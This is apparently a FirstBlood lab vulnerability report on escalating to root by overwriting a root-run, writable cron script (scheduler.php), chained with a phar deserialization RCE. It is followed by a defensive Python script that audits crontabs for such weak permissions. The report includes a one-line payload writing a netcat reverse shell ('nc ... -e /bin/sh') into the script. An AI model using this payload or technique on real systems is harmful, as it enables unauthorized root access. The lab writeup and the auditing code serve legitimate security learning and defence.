FirstBlood-#806 Privilege escalation when having root
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-28, twsec Level 2 reported:

From deserialization, we can get an RCE, but we're not root on the machine. This report explains how I did that.

1. With the RCE I'm the user fb-exec.

I made a few Google searches on Linux priv escalation cheat sheets, and they talk about cron jobs, so we try to find what kind of cron jobs we have.

2. List the cron jobs

firstblood and php are of interest.

We cat firstblood and find the following:

php scheduler.php is of interest; now we need to find scheduler.php.

ls -al to see the permissions on this file:

And we see write access, but first let's see its contents.

This file belongs to root but fb-exec can write to it, so we prepare our payload:

printf "<?php system('nc 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php

This command overwrites scheduler.php

and this is what it contains now

Now on our server we have to listen on that port and wait.

Once we get our connection, we check who we are and we're root.


Endpoint: api/checkproof.php

Parameter: proof

Payload: phar file

FirstBlood ID: 35
Vulnerability Type: RCE

A cron job is set to execute the file /app/firstblood/scheduler.php every minute as the root user. This file is writable by the FirstBlood PHP pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.
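The root cause summarised above is a configuration weakness a defender can audit for directly: a cron entry that runs as root but points at a file (or sits in a directory) that some non-root account can modify. The script below is an added example written for this page, not code from FirstBlood or from the reporter. It parses system-crontab lines (`/etc/crontab` and `/etc/cron.d/*` format, with the user field), pulls out absolute paths from each root command, and flags any path, or its parent directory, that is owned by a non-root uid, world-writable, or writable by a non-root group. The crontab text and the file modes in the demo are constructed to mirror the description (scheduler.php run every minute as root, root-owned but writable by the pool user); the gid 1001 and the exact mode bits are assumptions, not values from the report.

```python
"""Audit system-crontab entries for root jobs whose target files can be
modified by someone other than root (added example, not from the report)."""
import os
import re
import stat
from dataclasses import dataclass
from types import SimpleNamespace

# /etc/crontab and /etc/cron.d/* lines: <5 schedule fields> <user> <command>
SYSTEM_CRON_RE = re.compile(r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


@dataclass
class Finding:
    command: str   # the cron command that references the weak path
    path: str      # file or directory with the weak permission
    reason: str    # why a non-root user could modify it


def extract_paths(command):
    """Return absolute paths mentioned in a cron command.
    Shell operators are treated as separators so redirect targets count too."""
    tokens = re.split(r"[\s|;&<>]+", command)
    return [t for t in tokens if t.startswith("/")]


def weak_write_perms(st):
    """Return a reason if a non-root principal could write to this inode, else None."""
    if st.st_uid != 0:
        return "owned by non-root uid %d" % st.st_uid
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return "writable by non-root group gid %d" % st.st_gid
    return None


def audit_crontab(text, stat_fn=os.stat, exists_fn=os.path.exists):
    """Flag root cron entries whose referenced paths (or their parent directory,
    which would allow the file to be replaced) are writable by non-root users."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = SYSTEM_CRON_RE.match(line)
        if not m or m.group("user") != "root":
            continue  # non-root jobs and @reboot-style lines are not examined
        cmd = m.group("cmd")
        for path in extract_paths(cmd):
            for candidate in (path, os.path.dirname(path)):
                if not exists_fn(candidate):
                    continue
                reason = weak_write_perms(stat_fn(candidate))
                if reason:
                    findings.append(Finding(cmd, candidate, reason))
    return findings


# --- constructed demo data modelled on the report's description --------------
# The cron line is a reconstruction of "run scheduler.php every minute as root";
# the mode/uid/gid values are assumptions chosen to reproduce the weakness.
DEMO_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root php /app/firstblood/scheduler.php
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

def _fake(kind, mode, uid, gid):
    return SimpleNamespace(st_mode=kind | mode, st_uid=uid, st_gid=gid)

DEMO_FS = {  # path -> fake stat result
    "/app/firstblood": _fake(stat.S_IFDIR, 0o755, 0, 0),
    # root-owned, but group-writable by the pool user's group (assumed gid 1001)
    "/app/firstblood/scheduler.php": _fake(stat.S_IFREG, 0o664, 0, 1001),
    "/usr/sbin": _fake(stat.S_IFDIR, 0o755, 0, 0),
    "/usr/sbin/logrotate": _fake(stat.S_IFREG, 0o755, 0, 0),
    "/etc": _fake(stat.S_IFDIR, 0o755, 0, 0),
    "/etc/logrotate.conf": _fake(stat.S_IFREG, 0o644, 0, 0),
}


def demo():
    """Run the audit against the constructed data; returns the findings."""
    return audit_crontab(DEMO_CRONTAB, stat_fn=DEMO_FS.__getitem__,
                         exists_fn=DEMO_FS.__contains__)


if __name__ == "__main__":
    for f in demo():  # one finding: scheduler.php, writable by gid 1001
        print(f"{f.path}: {f.reason}  (cron: {f.command})")
    # On a real host, call audit_crontab() on /etc/crontab and each /etc/cron.d file.
```

The check deliberately treats a group-writable root-owned file as a finding when the group is not root's, since that is exactly the shape of the scheduler.php weakness: ownership alone looks fine in `ls -al`, the write bit for the pool user's group is what matters. It only sees absolute paths, so a command such as `cd /app && php scheduler.php` would need the directory checked by hand, and `@reboot`-style schedules are skipped.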